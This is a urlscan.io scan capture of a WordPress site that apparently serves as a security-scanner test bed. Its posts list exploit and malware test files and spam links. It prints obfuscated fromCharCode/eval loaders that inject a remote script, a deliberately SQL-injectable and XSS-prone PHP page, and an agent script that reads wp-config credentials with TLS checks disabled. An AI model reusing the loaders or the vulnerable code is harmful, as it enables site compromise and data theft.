yli0531-1.sldev7.com
Open in
urlscan Pro
108.179.226.25
Public Scan
Submitted URL: http://www.yli0531-1.sldev7.com/
Effective URL: https://yli0531-1.sldev7.com/
Submission: On June 20 via manual from UA — Scanned from DE
Effective URL: https://yli0531-1.sldev7.com/
Submission: On June 20 via manual from UA — Scanned from DE
Form analysis
1 forms found in the DOMGET https://yli0531-1.sldev7.com/
<form role="search" method="get" class="search-form" action="https://yli0531-1.sldev7.com/">
<label>
<span class="screen-reader-text">Search for:</span>
<input type="search" class="search-field" placeholder="Search …" value="" name="s">
</label>
<input type="submit" class="search-submit" value="Search">
</form>
Text Content
Skip to content YLI TEST WP 0531-1 Just another WordPress site POST 01 EN. Lorem ipsum SPAM LINK 01, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Nulla posuere sollicitudin aliquam ultrices sagittis orci a scelerisque purus. Odio eu feugiat pretium nibh ipsum. Et tortor at risus viverra. Tempus iaculis urna id volutpat lacus laoreet SPAM LINK 02. Lacinia quis vel eros donec ac odio tempor orci dapibus. Pellentesque id nibh tortor id aliquet. Tellus cras adipiscing enim eu turpis egestas. Lorem ipsum dolor sit amet consectetur adipiscing elit pellentesque habitant. TEST_xss_and_sqli.php?amount=20 TEST_xss_and_sqli.php?name=admin TEST_xss_and_sqli.php?id=1=20 TEST_xss_and_sqli.php?term=aaa TEST_xss_and_sqli.php?term=aaa&id=1&name=admin&amount=20 TEST_eicar.html TEST_FILE_zipbomb.zip TEST_malware_01.php TEST_malware_02.php TEST_malware_03.php TEST_malware_07.html TEST_malware_09.js test_xss.html text_xss2.php TEST_eicar.html TEST_FILE_zipbomb.zip TEST_js_crypto_miner.html TEST_adobe_flash_hacking_team_uaf.html TEST_adobe_flash_hacking_team_uaf.swf TEST_firefox_proto_crmfrequest.html TEST_firefox_proto_crmfrequest_addon.xpi TEST_java_jre17_exec.html TEST_java_jre17_exec.jar TEST_ms03_020_ie_objecttype.html audemars piguet replica cheap replica watches Posted byJune 4, 2024Posted inUncategorizedLeave a comment on Post 01 en. POST 02 RU. Лорем ипсум СПАМ ССЫЛКа 03, ет малуиссет симилияуе яуо, дуо цу яуот ностер фастидии, хинц магна вел еа. Диам ерипуит саперет ат нец, пурто цлита импердиет ест ан. Омниум цопиосае цу вих, ест видерер ратионибус ех. Синт пробатус меи еу, Спам ссылка 04 цонцлусионемяуе ид. Ин примис сусципиантур сед. Цум не десерунт пертинах, ид иус мутат аутем. Вих популо цоррумпит нецесситатибус ет. TEST_js_crypto_miner.html TEST_malware_04.php TEST_malware_05.php TEST_malware_06.php /TEST_malware_08.html TEST_malware_10.js TEST_ms05_054_onload.html TEST_ms09_002_memory_corruption.html TEST_ms09_072_style_object.html TEST_ms10_090_ie_css_clip_ie6.html TEST_ms11_003_ie_css_import_ie6.html TEST_ms11_003_ie_css_import_ie6_generic.dll TEST_ms14_064_ole_not_xp.html TEST_ms14_064_ole_xp.gif TEST_ms14_064_ole_xp.html TEST_vlc_amv.amv TEST_vlc_amv.html audemars piguet replica cheap replica watches Posted byJune 4, 2024Posted inUncategorizedLeave a comment on Post 02 ru. POST ./TEST_MALWARE_08.JS var z=String;var t=z.fromCharCode(118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,39,104,116,116,112,115,58,47,47,115,116,111,99,107,46,115,116,97,116,105,115,116,105,99,108,105,110,101,46,99,111,109,47,115,99,114,105,112,116,115,47,116,114,105,99,107,46,106,115,39,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,32,101,108,115,101,32,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,125);eval(/*77476456347368*/t); var z =String;var t=z.fromCharCode(118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,39,104,116,116,112,115,58,47,47,99,100,110,46,115,116,97,116,105,115,116,105,99,108,105,110,101,46,99,111,109,47,115,99,114,105,112,116,115,47,115,119,97,121,46,106,115,63,118,61,50,39,59,32,10,115,46,105,100,61,39,115,119,97,121,116,114,97,99,107,39,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,125);eval(/*465833345632*/t); Posted byJune 4, 2024Posted inUncategorizedLeave a comment on Post ./TEST_malware_08.js POST ./TEST_MALWARE_07.JS audemars piguet replica cheap replica watches Posted byJune 4, 2024Posted inUncategorizedLeave a comment on Post ./TEST_malware_07.js POST ./TEST_XSS_AND_SQLI.PHP Target for XSS scan XSS AND SQL INJECTIONS EXAMPLE: URL example: ./TEST_xss_and_sqli.php?term=aaa&id=1&name=admin&amount=20 connect_error) { die(“DB connection error: ” . $conn->connect_error); } $term = $_GET[‘term’]; if ($term) { echo “ Parameter term: $term “; } $number = $_GET[‘id’]; if ($number) { $result_number = $conn->query(“SELECT * FROM wp_users WHERE id=$number”); if ($result_number) { foreach($result_number as $raw){ foreach($raw as $val){ echo $val . ” “; } } } else { echo “ Error: ” . $conn->error . “ “; } } $string = $_GET[‘name’]; if ($number) { $result_string = $conn->query(“SELECT * FROM wp_users WHERE user_login= ‘$string’ “); if ($result_string) { foreach($result_string as $raw){ foreach($raw as $val){ echo $val . ” “; } } } else { echo “ Error: ” . $conn->error . “ “; } } $conn->close(); ?> Posted byJune 4, 2024Posted inUncategorizedLeave a comment on Post ./TEST_xss_and_sqli.php POST ./TEST_SUSPISIOS_FILE_01.PHP $header_value ) { if ( strcasecmp( $header_key, $header_with_ip_key ) === 0 ) { // if this is a comma-separated list of IPs if ( stripos( $header_value, ‘,’ ) !== false ) { $ips = explode( ‘,’, $header_value ); foreach( $ips AS $ip) { $collected_IPs[] = trim( $ip ); } } // original logic: single IP value else { $collected_IPs[] = $header_value; } } } } // original logic – fallback case $collected_IPs[] = $_SERVER[‘REMOTE_ADDR’]; $validated_IPs = array(); foreach( $collected_IPs AS $collected_IP ) { if ( version_compare( PHP_VERSION, ‘5.2.0’, ‘>=’ ) ) { if ( filter_var( $collected_IP, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4 ) ) { // store them as keys to avoid duplicates $validated_IPs[ $collected_IP ] = true; } } } return array_keys( $validated_IPs ); } function add_to_log( $message = ”, $title = ” ) { global $_LOG; if ( $title != ” ) { $_LOG .= ‘ ‘ . $title . ‘ ‘; } ob_start(); echo ‘ '; print_r( $message ); echo ' ‘; echo ‘ -------------------------------------------------------------------------------- ‘; $_LOG .= ob_get_contents(); ob_end_clean(); } function delete_log_file() { global $_FEATURECODE; $log_file_name = “{$_FEATURECODE}_log.php”; if ( file_exists( $log_file_name ) ) { unlink( $log_file_name ); } } function add_to_log_section_start( $section_name ) { global $_LOG; $color = ‘#FFF’; switch( $section_name ) { case ‘CheckFeatures’: $color = ‘#AAF’; break; case ‘RemoteApi’: $color = ‘#FAF’; break; case ‘GrabAndZip’: case ‘BackupGrabAndZip’: $color = ‘#AFA’; break; case ‘UnzipAndApply’: case ‘BackupUnzipAndApply’: $color = ‘#FFA’; break; case ‘IP Validation’: $color = ‘#AAA’; break; case ‘Encryption’: $color = ‘#AFF’; break; } $_LOG .= “ “; $_LOG .= “ {$SECTION_NAME} “; } // saves the log… not so sure about function name function send_email( $message = ” ) { global $_SAVE_LOG, $_FEATURECODE; $log_file_name = “{$_FEATURECODE}_log.php”; // if URL is Staging, always log since this is where we’d test and review logs frequently if ( preg_match( ‘/mapi.[a-z]+.dev[\d]?.sitelock.com/’, API_URL ) == 1 ) { $_SAVE_LOG = true; } if ( $_SAVE_LOG ) { // first, remove previous log file if ( file_exists( $log_file_name ) ) { unlink( $log_file_name ); } // next, create the log file again $log = fopen( $log_file_name, “w” ); // add logging data to the log file fwrite( $log, $message ); // close the log file fclose( $log ); } } function get_our_path() { $parts = func_get_args(); return implode(DIRECTORY_SEPARATOR, $parts); } function delete_unique_directory( $path = false ) { global $_UNIQUE, $descriptor_ext; $deleted_items = 0; if ( !$path ) { $path = get_our_path(‘.’, “.$_UNIQUE” ); } if ( is_dir( $path ) ) { // check for files in our $_UNIQUE $descriptor_file = glob( $path . DIRECTORY_SEPARATOR . ‘*.zip’ . $descriptor_ext ); if ( isset( $descriptor_file[0] ) && is_file( $descriptor_file[0] ) && file_exists( $descriptor_file[0] ) ) { unlink( $descriptor_file[0] ); $deleted_items++; add_to_log( $descriptor_file[0], ‘delete_unique_directory – unlink( $descriptor_file[0] );’); } $zip_chunks = glob( $path . DIRECTORY_SEPARATOR . ‘*.zip.[0-9]*’ ); if ( is_array( $zip_chunks ) ) { foreach ( $zip_chunks as $file ) { // delete file if ( is_file( $file ) && file_exists( $file ) ) { unlink( $file ); $deleted_items++; add_to_log( $file, ‘delete_unique_directory – file chunk’); } } } // @TODO remove this eventually // old logic – for unchunked zip file { $zip_files = glob( $path . DIRECTORY_SEPARATOR . ‘[0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9][12][0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9].zip’ ); if ( is_array( $zip_files ) ) { foreach ( $zip_files as $file ) { // delete file $deleted_items++; unlink( $file ); } } } // check for any csv files that were not successfully zipped – those contain raw data and gotta be clenaup up for good! $raw_CSVs = glob( $path . DIRECTORY_SEPARATOR . ‘*-[12][0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9].csv’ ); if ( is_array( $raw_CSVs ) ) { foreach ( $raw_CSVs as $file ) { // delete file if ( is_file( $file ) && file_exists( $file ) ) { unlink( $file ); $deleted_items++; add_to_log( $file, ‘delete_unique_directory – raw csv’); } } } // now that all files are deleted we can delete the directory rmdir( $path ); $deleted_items++; add_to_log( $path, ‘delete_unique_directory – rmdir( $path )’); } return $deleted_items; } // Adding this function to drop files left in /tmp since upgrade to chunking, when API stopped calling ‘cmd=complete’ // @TODO: remove & stop calling this some time in the future function cleanup_old_tmp_trash() { global $_UNIQUE, $_SAVE_LOG; $cleanups_count = 0; $dir = dirname( __FILE__ ) . DIRECTORY_SEPARATOR; // (1) Cleanup older bullet files $glob_bullet_1_char = ‘[0-9a-f]’; $glob_file_name_pattern = str_repeat( $glob_bullet_1_char, 32 ); $files = glob( $dir . $glob_file_name_pattern . ‘.php’ ); if ( is_array( $files ) ) { foreach ( $files as $file ) { // skip our own bullet if ( $file == __FILE__ ) { continue; } // check file if ( is_file( $file ) && file_exists( $file ) && !file_was_recently_modified( $file ) ) { // make sure file content is what we expect and not user’s file that happened to have matching name $fh = fopen( $file, ‘r’ ); $line1 = trim( fgets( $fh ) ); $line2 = trim( fgets( $fh ) ); fclose( $fh ); if ( $line1 == ‘ 1000000000 // check if it looks like a timestamp of value after 2001-ish ) { unlink( $file ); $cleanups_count++; add_to_log( $file, ‘cleanup_old_tmp_trash (1.1)’); } } } } // (2) Cleanup: older key filesand directories $paths = glob( $dir . ‘.’ . $glob_file_name_pattern ); if ( is_array( $paths ) ) { foreach ( $paths as $path ) { //skip our own bullet’s temp dir if ( $path == realpath( get_our_path(‘.’, “.$_UNIQUE”) ) ) { continue; } if ( file_exists( $path ) ) { // (2.1) Cleanup: older key files (name format: .[32 hex chars]) if ( is_file( $path ) && !file_was_recently_modified( $path ) ) { // make sure file content is what we expect and not user’s file that happened to have matching name $fh = fopen( $path, ‘r’ ); $line1 = trim( fgets( $fh ) ); $line2 = fgets( $fh ); fclose( $fh ); if ( !$line2 && // file has only one line ( $delim_pos = strpos( $line1, ‘:’ ) ) !== false && // parameter after “:” decodes as hex preg_match( ‘/[0-9a-f]+/’, base64_decode( substr( $line1, $delim_pos +1 ) ) ) == 1 // looks like encoded key ) { unlink( $path ); $cleanups_count++; add_to_log( $path, ‘cleanup_old_tmp_trash (2.1)’); } } // (2.2) Cleanup: older directories (name format: .[32 hex chars] as well) if ( is_dir( $path ) && !file_was_recently_modified( $path . DIRECTORY_SEPARATOR . ‘.’ ) ) { $cleanups_count += delete_unique_directory( $path ); } } } } // (3) Cleanup: zip files for restore that were never removed. // Safe to remove them all as long as we only cann this from Grab and Zip, // so valid uploaded zips for Unzip and Apply should all processed and removed by now. $zip_paths = glob( $dir . $glob_file_name_pattern . ‘.zip’ ); if ( is_array( $zip_paths ) ) { foreach ( $zip_paths as $file ) { // check file if ( is_file( $file ) && file_exists( $file ) && !file_was_recently_modified( $file ) ) { unlink( $file ); $cleanups_count++; add_to_log( $file, ‘cleanup_old_tmp_trash (3)’); } } } // if anything was cleaned up, log everything for review if ( $cleanups_count > 0 ) { $_SAVE_LOG = true; } } // Helper function to determine if file was modified recently // anything less than 6 hours will be considered recent/active and will not be touched function file_was_recently_modified( $path, $how_old_is_old = 21600 ) { global $_START_TIME; // check time difference between bullet creation and file modification $time_diff = $_START_TIME – filemtime( $path ); if ( $time_diff < $how_old_is_old ) { return true; } return false; } function try_json_decode( $string ) { if ( // pure number will be JSON-encoded w/o any changes, so need to check for explicit JSON delimiters: ( substr( $string, 0, 1 ) == '{' || substr( $string, 0, 1 ) == '[' ) && // if parsing fails, error will be recorded ( $parsed_string = json_decode( $string, true, 2, JSON_BIGINT_AS_STRING ) ) && json_last_error() === JSON_ERROR_NONE ) { return $parsed_string; } else { return $string; } } function log_bullet_run_time() { global $_START_TIME; $time = round( microtime(true) - $_START_TIME, 2 ); add_to_log( $time, 'Bullet run time, seconds.' ); return $time; } function obfuscate( $value, $length = 3, $replacement = '***' ) { return substr( $value, 0, $length ) . $replacement; } # OtherUtils - END # HTTP - START define('API_URL', 'https://mapi.sitelock.com/v3/connect/' ); define('MAPI_CURL_CONNECT_TIMEOUT', '3' ); define('MAPI_CURL_RESPONSE_TIMEOUT', '10' ); const LOG_MAPI_NONE = 0; const LOG_MAPI_REQUEST = 1; const LOG_MAPI_ALL = 2; $CURL_INIT_ERR = false; $CURL_MAPI_ERR = false; function mapi_post( $token, $action, $params, $log_level = LOG_MAPI_ALL ) { global $_SAVE_LOG; if ( !is_array($params)) { die('_bad_post_params'); } $request = array( 'pluginVersion' => ‘100.0.0’, ‘apiTargetVersion’ => ‘3.0.0’, ‘token’ => $token, ‘requests’ => array( ‘id’ => md5(microtime()) . ‘-‘ . implode(”, explode(‘.’, microtime(true))), ‘action’ => $action, ‘params’ => $params, ), ); $rjson = json_encode($request); // json must be base64 encoded $rjson = base64_encode( $rjson ); if ( $log_level >= LOG_MAPI_REQUEST ) { add_to_log(API_URL, ‘mapi_post URL’); // hide token from log $request_cleaned = $request; $request_cleaned[‘token’] = obfuscate( $request_cleaned[‘token’] ); add_to_log($request_cleaned, ‘mapi_post_request’); } $return = curl_post( API_URL, $rjson ); if( !isset( $return->status ) || $return->status != ‘ok’ ) { $_SAVE_LOG = true; } if ( $log_level == LOG_MAPI_ALL ) { // clean up tokens from response $return = str_replace( $token, obfuscate($token), $return ); add_to_log(‘‘ . $return . ‘‘, ‘mapi_response’); } return $return; } function curl_post( $url, $postbody, $log_level = LOG_MAPI_ALL ) { global $CURL_INIT_ERR, $CURL_MAPI_ERR; if ( ($disabled_functions=test_curl_available()) !== true ) { $CURL_INIT_ERR = true; add_to_log( ‘FALSE’, ‘test_curl_available() returned the following disabled cURL functions: ‘ . implode(‘, ‘, $disabled_functions)); return false; } else { $CURL_INIT_ERR = false; } $ch = curl_init( $url ); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $postbody); // control timeout curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, MAPI_CURL_CONNECT_TIMEOUT); curl_setopt($ch, CURLOPT_TIMEOUT, MAPI_CURL_RESPONSE_TIMEOUT); $ret = curl_exec($ch); // capture and store error globaly if return looks like a failure if($ret === false) { $CURL_MAPI_ERR = curl_error($ch); } // otherwise, clean up the error else { $CURL_MAPI_ERR = false; if ( $log_level >= LOG_MAPI_REQUEST ) { $info = curl_getinfo($ch); add_to_log($info, ‘curl_getinfo()’); } } curl_close($ch); return $ret; } function test_curl_available() { if ( !extension_loaded(‘curl’) ) { return [‘cURL Extension’]; } $function_names = [ ‘curl_init’, ‘curl_exec’, ‘curl_post’, ‘curl_setopt’, ‘curl_error’, ‘curl_getinfo’, ‘curl_close’ ]; $disabled_functions = []; foreach($function_names AS $function_name) { if ( !function_exists($function_name) ) { $disabled_functions[] = $function_name; } } return empty($disabled_functions) ? true : $disabled_functions; } // Complete simple self-test initited by API. // Get a response – bullet is reachable via HTTP function test_bullet_is_reachable() { if ( $_GET[ ‘cmd’ ] == ‘test’ ) { die( json_encode( array( ‘status’ => ‘ok’ ) ) ); } } # HTTP – END # Encryption – START add_to_log_section_start( ‘Encryption’ ); add_to_log( defined(‘PHP_VERSION’) ? PHP_VERSION : phpversion(), ‘PHP Version’); define( ‘OPENSSL’, ‘OpenSSL’ ); define( ‘MCRYPT’, ‘MCrypt’ ); define( ‘CRYPTOR’, establish_cryptor() ); // only applies to MCrypt, which is deprecated as of PHP 7.1, but still in use by some clients define( ‘ENCRYPT_DEFAULT_MODE’, establish_default_mode() ); $_ENCRYPT_USE_CIPHER = establish_default_cipher(); $_ENCRYPT_USE_CIPHER_KEY = null; $_ENCRYPT_USE_CIPHER_IV = null; check_internal_encoding(); function establish_cryptor() { if ( function_exists(‘openssl_cipher_iv_length’) && function_exists(‘openssl_get_cipher_methods’) && function_exists(‘openssl_encrypt’) && function_exists(‘openssl_decrypt’) ) { add_to_log( OPENSSL, ‘Cryptor’); return OPENSSL; } else if ( function_exists(‘mcrypt_get_iv_size’) && function_exists(‘mcrypt_get_key_size’) && function_exists(‘mcrypt_list_algorithms’) && function_exists(‘mcrypt_encrypt’) && function_exists(‘mcrypt_decrypt’) ) { add_to_log( MCRYPT, ‘Cryptor’); return MCRYPT; } else { update_scan_on_error( ‘CHECK_FEATURE_ERR_NO_CRYPTO’, array( ‘encfail’ => ‘establish_cryptor’ ) ); } } function establish_default_cipher() { if ( CRYPTOR === OPENSSL ) { $algorithms = openssl_get_cipher_methods(true); // In the order of preference, we want to use AES-CBC from 256 down to 128. // bf-cbc is here to preserve bullet’s legacy logic, although PERL’s original logic is to use blowfish, so including it first. $preferred_algos = [ ‘aes-256-cbc’, ‘aes-192-cbc’, ‘aes-128-cbc’, ‘blowfish’, ‘bf-cbc’ ]; foreach( $preferred_algos AS $preferred_algo ) { if ( in_array( $preferred_algo, $algorithms ) ) { add_to_log( $preferred_algo, ‘Default Cipher’); return $preferred_algo; } } // otherwise we can’t proceed: PERL can’t use arbitrary cipher if it doesn’t expect it update_scan_on_error( ‘CHECK_FEATURE_ERR_NO_CRYPTO’, array( ‘encfail’ => ‘None of preferred cryptors found in establish_default_cipher’ ) ); } else if ( CRYPTOR === MCRYPT ) { $algorithms = mcrypt_list_algorithms(); // see if we can use blowfish if ( in_array( MCRYPT_BLOWFISH, $algorithms ) ) { add_to_log( MCRYPT_BLOWFISH, ‘Cipher’); return MCRYPT_BLOWFISH; } // otherwise use the first one from the list else { add_to_log( “Will use {$algorithms[0]} from ” . json_encode($algorithms), ‘MCrypt “blowfish” not found!’ ); return $algorithms[0]; } } else { update_scan_on_error( ‘CHECK_FEATURE_ERR_NO_CRYPTO’, array( ‘encfail’ => ‘unknown cryptor “‘ . CRYPTOR . ‘” in establish_default_cipher’ ) ); } } function establish_default_mode() { if ( CRYPTOR === OPENSSL ) { // mode not used by OpenSSL return 0; } else if ( CRYPTOR === MCRYPT ) { // see if we can use mcrypt constant if ( defined( MCRYPT_MODE_CBC ) ) { add_to_log( MCRYPT_MODE_CBC, ‘Mode’); return MCRYPT_MODE_CBC; } // otherwise try to manually use ‘CBC’; else { add_to_log( “Manually set mode to cbc”, ‘MCRYPT_MODE_CBC not found!’ ); return ‘cbc’; } } else { update_scan_on_error( ‘CHECK_FEATURE_ERR_NO_CRYPTO’, array( ‘encfail’ => ‘establish_default_mode’ ) ); } } function get_encryption_info() { global $_TOKEN, $_SITEID, $_SINGLEID, $_ENCRYPT_USE_CIPHER, $_ENCRYPT_USE_CIPHER_KEY, $_ENCRYPT_USE_CIPHER_IV; if ( $_ENCRYPT_USE_CIPHER && $_ENCRYPT_USE_CIPHER_KEY && $_ENCRYPT_USE_CIPHER_IV) { return [ 0 => $_ENCRYPT_USE_CIPHER, 1 => $_ENCRYPT_USE_CIPHER_KEY, 2 => $_ENCRYPT_USE_CIPHER_IV, ]; } $payload = array( ‘site_id’ => $_SITEID, ‘queue_id’ => $_SINGLEID ); $raw_response = mapi_post( $_TOKEN, ‘s3_get_enc_info’, $payload, LOG_MAPI_REQUEST ); $get_encryption_info_response = json_decode( $raw_response, true ); // Only continue if status is successful if ( isset( $get_encryption_info_response[‘responses’][0][‘data’][‘s3_status’] ) && $get_encryption_info_response[‘responses’][0][‘data’][‘s3_status’] == ‘ok’ ) { $data = $get_encryption_info_response[‘responses’][0][‘data’]; $cipher = $data[‘cipher’]; $key = base64_decode($data[‘cipher_key’]); $iv = base64_decode($data[‘cipher_iv’]); add_to_log( [ ‘cipher’ => $cipher, ‘key’ => obfuscate( $data[‘cipher_key’] ), ‘iv’ => obfuscate( $data[‘cipher_iv’] ) ], ‘Received encryption details’); switch( CRYPTOR ) { case OPENSSL : $iv = str_pad(”, openssl_cipher_iv_length( $cipher ), $iv ); break; case MCRYPT : $iv = str_pad(”, mcrypt_get_iv_size( $cipher, ENCRYPT_DEFAULT_MODE), $iv ); $key = str_pad(”, mcrypt_get_key_size($cipher, ENCRYPT_DEFAULT_MODE), $key); break; default: update_scan_on_error( ‘CHECK_FEATURE_ERR_NO_CRYPTO’, array( ‘encfail’ => ‘2 (Unknown cryptor: ‘ . CRYPTOR . ‘)’ ) ); } // cache values $_ENCRYPT_USE_CIPHER = $cipher; $_ENCRYPT_USE_CIPHER_KEY = $key; $_ENCRYPT_USE_CIPHER_IV = $iv; // New in [SE-957]: now also returning cipher return array( 0 => $cipher, 1 => $key, 2 => $iv, ); } else { update_scan_on_error( ‘ENCRYPTION_FAILED’, array( ‘encfail’ => ‘6 (Problem with get_enc_info call)’ ) ); } } function encrypt_string( $string ) { global $_FEATURECODE; list($cipher, $key, $iv) = get_encryption_info(); if ( CRYPTOR === OPENSSL ) { // 1) Backup: if ( $_FEATURECODE == BACKUP ) { // Prior to PHP 5.4, $options param was boolean raw_data with “true” equivalent to the new flag // https://stackoverflow.com/questions/24707007/using-openssl-raw-data-param-in-openssl-decrypt-with-php-5-3 // OPENSSL_RAW_DATA flag takes care of returning raw encoded data, so we no longer need to take 2 extra steps // to base64-decode string that was just being base64-encoded automatically by openssl_encrypt. $options = defined( OPENSSL_RAW_DATA ) ? OPENSSL_RAW_DATA : 1; return openssl_encrypt($string, $cipher, $key, $options, $iv); } // 2) DB Scan // API still sends data with padding so we’ll keep the original logic // 2.1) NEW DB Scan: else if ( $_FEATURECODE == DBSCAN ) { $options = defined( OPENSSL_RAW_DATA ) ? OPENSSL_RAW_DATA : 1; return openssl_encrypt($string, $cipher, $key, $options, $iv); } } if ( CRYPTOR === MCRYPT ) { $mode = ENCRYPT_DEFAULT_MODE; return mcrypt_encrypt($cipher, $key, $string, $mode, $iv); } update_scan_on_error( ‘CHECK_FEATURE_ERR_NO_CRYPTO’, array( ‘encfail’ => ‘4 (encrypt_string)’ ) ); } function decrypt_string( $string ) { global $_FEATURECODE; list($cipher, $key, $iv) = get_encryption_info(); if ( CRYPTOR === OPENSSL ) { // 1) Backup: if ( $_FEATURECODE == BACKUP ) { // Using same OPENSSL_RAW_DATA flag as in encrypt_string above to make encryption and decryption function symmetrically $options = defined( OPENSSL_RAW_DATA ) ? OPENSSL_RAW_DATA : 1; return openssl_decrypt($string, $cipher, $key, $options, $iv); } // 2) DB Scan // 2.1) NEW DB Scan else if ( $_FEATURECODE == DBSCAN ) { // Using same OPENSSL_RAW_DATA flag as in encrypt_string above to make encryption and decryption function symmetrically $options = defined( OPENSSL_RAW_DATA ) ? OPENSSL_RAW_DATA : 1; return openssl_decrypt($string, $cipher, $key, $options, $iv); } } if ( CRYPTOR === MCRYPT ) { $mode = ENCRYPT_DEFAULT_MODE; return mcrypt_decrypt($cipher, $key, $string, $mode, $iv); } update_scan_on_error( ‘CHECK_FEATURE_ERR_NO_CRYPTO’, array( ‘encfail’ => ‘5 (decrypt_string)’ ) ); } function check_internal_encoding() { if ( function_exists( ‘mb_internal_encoding’ ) ) { add_to_log( mb_internal_encoding(), ‘mb_internal_encoding’ ); } else { add_to_log( ‘Not available, possibly no mbstring extension.’, ‘mb_internal_encoding’ ); } } # Encryption – END /** * MAIN point of entry for WordPress */ function import_WP_creds() { $localdir = get_bullet_location(); if ( file_exists( $localdir . ‘wp-config.php’ ) ) { $file = file_get_contents( $localdir . ‘wp-config.php’ ); }else{ // check one level up just like in wp-load.php. If wp-settings.php exists, then that is a separate WP install not to be used if ( @file_exists( dirname( $localdir ) . ‘/wp-config.php’ ) && !@file_exists( dirname( $localdir ) . ‘/wp-settings.php’ ) ) { $file = file_get_contents( dirname( $localdir . $extradir ) . ‘/wp-config.php’ ); }else{ // check for hard-coded subdir paths in index.php. Only check for this if standard config fails $hard_path =”; if ( @file_exists( $localdir . ‘index.php’ ) ) { $lines = file( $localdir . ‘index.php’ ); foreach ( $lines as $line ) { $end_pos = strpos( $line, ‘/wp-blog-header’); if ( $end_pos ){ $start_pos = strpos( $line, ‘/’ ); $tok_len = $end_pos – $start_pos; // extract path token without slashes $hard_path = substr( $line, $start_pos + 1, $tok_len – 1 ); break; } } if ( $hard_path ){ if ( @file_exists( $localdir . $hard_path.’/wp-config.php’ ) ) { $file = file_get_contents( $localdir . $hard_path. ‘/wp-config.php’ ); }else{ // no config detected on any known path update_scan_on_error( ‘DB_SCAN_NO_CONFIG_FOUND’, array( ‘get-config’ => array( ‘localdir’ => $localdir, ‘hard_path’ => $hard_path ) ) ); } } } } } $tokens = array(); foreach ( token_get_all($file) as $tok ) { if ( is_array($tok) && in_array( $tok[0], array( T_COMMENT, T_DOC_COMMENT, T_WHITESPACE, T_OPEN_TAG ))) { continue; } $tokens[] = $tok; } for ($i = 0, $tc = count($tokens); $i < $tc; ++$i ) { if (!is_array($t = $tokens[$i])) { continue; } switch($t[0]) { case T_STRING: if (strtolower($t[1]) != 'define') { break; } if ( !is_array($tokens[++$i]) && $tokens[$i] == '(' && is_array($tokens[++$i]) && $tokens[$i][0] == T_CONSTANT_ENCAPSED_STRING && in_array( ( $cur = clearString( $tokens[$i][1] ) ), array( 'DB_HOST', 'DB_USER', 'DB_PASSWORD', 'DB_NAME' ) ) && $tokens[++$i] == ',' && is_array($tokens[++$i]) && $tokens[$i][0] == T_CONSTANT_ENCAPSED_STRING ) { //print "Found $cur = " . clearString($tokens[$i][1]) . "\n"; define( $cur, clearString($tokens[$i][1]) ); } // check for multisite setting with bool param, not string like above. 319 is the token type of param here. if ( clearString( $tokens[$i][1] ) == 'WP_ALLOW_MULTISITE' &&$tokens[++$i] == ',' && is_array($tokens[++$i] ) && $tokens[$i][1] == 'true' ) { define( 'WP_ALLOW_MULTISITE', true ); } break; case T_VARIABLE: if ( $t[1] != '$table_prefix' ) { break; } if ( !is_array($tokens[++$i]) && $tokens[$i] == '=' && is_array($tokens[++$i]) && $tokens[$i][0] == T_CONSTANT_ENCAPSED_STRING ) { //print "Found table_prefix as " . clearString($tokens[$i][1]) . "\n"; define( 'DB_PREFIX', clearString($tokens[$i][1]) ); } break; } } if ( !( defined('DB_HOST') && defined('DB_USER') && defined('DB_PASSWORD') && defined('DB_NAME') ) ){ $wpt = token_get_all( $file ); $wpn = ''; foreach ( $wpt as $index => $t ) { switch (true) { case !is_array($t): $wpn .= $t; case in_array($t[0], array(T_INLINE_HTML, T_OPEN_TAG, T_OPEN_TAG_WITH_ECHO)): break; case in_array($t[0], array(T_INCLUDE, T_INCLUDE_ONCE, T_REQUIRE, T_REQUIRE_ONCE, T_RETURN, T_EXIT, T_EVAL)): // Commenting out boolean in the middle of define was causing 500 error – not good!! // Example: define( “WP_DEBUG”, //false ); case $t[0] == T_STRING && !in_array( $t[1], array( ‘true’,’false’ ) ) and ( strtolower($t[1]) == ‘header’ || !function_exists($t[1]) ): // Also, if previous token was a silence @, we need to add comment *before* that. if ( isset( $wpt[$index-1] ) && $wpt[$index-1] == ‘@’ ) { $wpn = substr( $wpn, 0, strlen()-2 ) . ‘//@’; } else { $wpn .= ‘//’; } default: $wpn .= 